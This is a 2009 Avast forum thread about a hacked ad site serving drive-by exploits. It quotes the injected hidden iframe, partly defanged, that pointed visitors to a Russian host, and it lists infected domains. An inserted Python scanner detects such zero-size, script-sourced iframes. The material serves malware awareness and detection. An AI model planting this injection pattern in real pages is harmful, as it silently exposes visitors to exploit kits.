Avast WEBforum

Other => General Topics => Topic started by: polonus on November 11, 2009, 08:47:09 PM

Title: Big Media site hacked to infect....
Post by: polonus on November 11, 2009, 08:47:09 PM
Hi malware fighters,

A large online ad firm website has been hacked and is being used to infect unaware visitors. Media-servers.net is among the Top 900 most frequently visited Internet sites. Attackers mainly used old exploits that they hide on the website. Used were vulnerability holes for Microsoft DirectShow, Microsoft Snapshot Viewer, Microsoft Data Access Components (MDAC), AOL ConvertFile, Adobe Reader and Acrobat. The majority of these holes date from 2007 and 2008##. According to Websense, which found the hack, the injected code forms part of a massive hack campaign to put malcode onto legit websites:
http://securitylabs.websense.com/content/Alerts/3500.aspx

External References

- superkahn.ru suspicious ↗ - displaying 1 of 1
<IFrame> hidden link - hXtp://superkahn.ru:8080/index.php *

^iframe frameborder="0" onload="if (!this.src){ this.src='hXtp://superkahn.ru:8080/index.php'; ..^^this.height='0'; this.width='0';}" ^jykemwkucwwucrgacoggnconqcaqvfl^/iframe^
(code secured by me - avast detects this as "HTML:Illiframe-D [Trj]")

* Malicious software includes 7 trojans, 7 exploits.

This site was hosted on 8 network(s) including AS16276 (OVH), AS16265 (LEASEWEB), AS28753 (NETDIRECT).

Has this site been redirecting to spread malicious software?
It seems that superkahn.ru has been functioning during the last 90 days to spread infections of 4 sites, e.g. karunkoleji.k12.tr/, yaprakyapi.com.tr/, bodzashop.extra.hu/.

Has this site been hosting malware?
The malicious software infected 77 domains, e.g. art-vid.com/, nutrilox.com/, fabiamotorsport.com/.
Detected was
Name of threat:   Downloader.Fostrem
Location of this threat:    hxtp://superkahn.ru:8080/pics/win.jpg
Location of mentioned site: France,

polonus

## N.B. See how important it is to have your OS and third-party software fully upgraded and fully patched, so check with Secunia PSI - older software and you could be vulnerable...
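
An added example, not part of the original posts: a small Python scanner for the injection pattern quoted in the post above, an iframe whose onload handler sets its own src and collapses the frame to zero size. The sample page and the host `injected.example` are constructed, and the heuristics are assumptions for illustration, not avast's or Websense's detection logic.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline handler that assigns the frame URL at load time: this.src='...'
SRC_ASSIGN = re.compile(r"""this\.src\s*=\s*['"]([^'"]+)['"]""", re.I)
# Inline handler that collapses the frame: this.height='0'; this.width='0';
ZERO_SIZE = re.compile(r"""this\.(?:height|width)\s*=\s*['"]?0(?:px)?['"]?\s*[;}]""", re.I)
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)

class HiddenIframeFinder(HTMLParser):
    """Collects iframes that are hidden or that take their URL from script."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        onload, url, reasons = a.get("onload", ""), a.get("src", ""), []
        m = SRC_ASSIGN.search(onload)
        if m:
            url = m.group(1)
            reasons.append("src set from onload handler")
        if ZERO_SIZE.search(onload) or "0" in (a.get("width"), a.get("height")):
            reasons.append("zero-size frame")
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden by style")
        try:
            port = urlparse(url).port
        except ValueError:  # malformed port in the URL: not flagged here
            port = None
        if port not in (None, 80, 443):
            reasons.append(f"non-standard port {port}")
        if reasons:
            self.findings.append({"url": url, "line": self.getpos()[0], "reasons": reasons})

def scan(html):
    """Return one finding per suspicious iframe in the given HTML text."""
    finder = HiddenIframeFinder()
    finder.feed(html)
    return finder.findings

# Constructed sample: one ordinary embed and one frame shaped like the quoted injection.
SAMPLE = """<html><body>
<iframe src="https://www.example.com/video" width="560" height="315"></iframe>
<iframe frameborder="0" onload="if (!this.src){ this.src='http://injected.example:8080/index.php'; this.height='0'; this.width='0';}">filler</iframe>
</body></html>"""
```

`scan(SAMPLE)` returns a single finding for the second frame, with the URL recovered from the handler and the reasons it was flagged.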

Title: Re: Big Media site hacked to infect....
Post by: nmb on November 12, 2009, 01:13:14 PM
Thanks for the update sir pol.

I use the hosts-file.net adservers list, which includes mediaservers.net, so nothing to worry about.

nmb